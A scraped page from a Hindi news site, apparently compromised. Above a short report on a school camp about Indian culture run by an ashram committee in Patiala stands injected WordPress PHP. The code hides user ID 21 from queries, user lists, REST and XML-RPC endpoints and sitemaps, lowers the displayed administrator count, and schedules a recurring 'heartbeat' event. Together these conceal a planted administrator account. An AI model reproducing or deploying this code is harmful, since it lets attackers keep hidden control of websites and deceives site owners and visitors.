add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
भारतीय संस्कृति एवं अच्छे आचरण के महत्व - Press Ki Taquat
No Result
View All Result
श्री योग वेंदात सेवा समिति, पूज्य संत श्री आसारामजी बापू आश्रम पटियाला द्वारा वीर हकिकत राए माडल सिनियर सैकेंडरी स्कूल में मिसज सरला भटनागर एव स्कूल मैनेज्मेंट की आज्ञा व सहयोग से लड़कों का एक दिवसिय शिविर लगाया गया जिसमें सभी लड़कों को भारतीय संस्कृति परम्परा के अनुसार महत्व बताया गया लडकों को ऐहिक शिक्षा के इलावा आध्यात्मिक शिक्षा, अनुशासन , शिक्षा व हर क्षेत्र में सफलता प्राप्त करने के योगिक क्रियाएं, परिक्षा में अच्छे मार्कस लेने सम्बंधी, एव बच्चों को अपने माता पिता एव गुरुजनों का आदर करने के बारे में विस्तार से समझाया इसके इलावा बच्चों को पश्चिम वृतियों से जिनके कारण बच्चों का भविष्य का पतन हो रहा के बारे मेंअवगत कराया, बच्चों ने बडे ही ध्यान से सुना और अपने जीवन में अच्छे सरकारों को अपनाने के लिए विश्वास दिलाया स्कूल के प्रिंसिपल मिसज सरला भटनागर जी ने भी बच्चों को सम्बोधित किया और जीवन में अच्छे सस्कारों को अपनाने के लिए प्रोतसाहित किया एव समिति के प्रधान श्री प्रेम सिंह सोखल एवं सभी मैम्बरो का धन्यावाद किया
Post Views: 196
No Result
View All Result